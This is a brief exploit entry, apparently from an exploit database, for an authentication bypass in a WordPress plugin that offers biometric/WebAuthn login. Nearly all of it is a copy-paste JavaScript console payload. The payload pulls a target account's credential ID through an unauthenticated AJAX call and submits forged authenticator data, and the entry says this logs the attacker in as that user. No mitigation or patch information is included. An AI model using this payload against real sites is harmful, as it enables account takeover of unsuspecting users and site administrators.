Share
## https://sploitus.com/exploit?id=WPEX-ID:0F0FEEC8-869C-4D10-AE28-E41A6D29CB6E
While on the site (not logged in!) paste the following in your browser's console. Be sure to change 'TARGET_EMAIL@DOMAIN.TLD' with the email address of the account you're targeting, and that this account has WebAuthn enabled.

const id = (await (await fetch('/wp-admin/admin-ajax.php?action=fme_wbl_login_using_biometric&user_email=TARGET_EMAIL@DOMAIN.TLD')).json()).publicKey.allowCredentials[0].id.split('?')[3];fetch('/wp-admin/admin-ajax.php?action=fme_wbl_verify_using_biometric&user_name=TARGET_EMAIL@DOMAIN.TLD&auth_data='+JSON.stringify({clientDataJSON:"e30=",authenticatorData:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",id}))

After refreshing the page, you'll notice you're now logged-in as that user.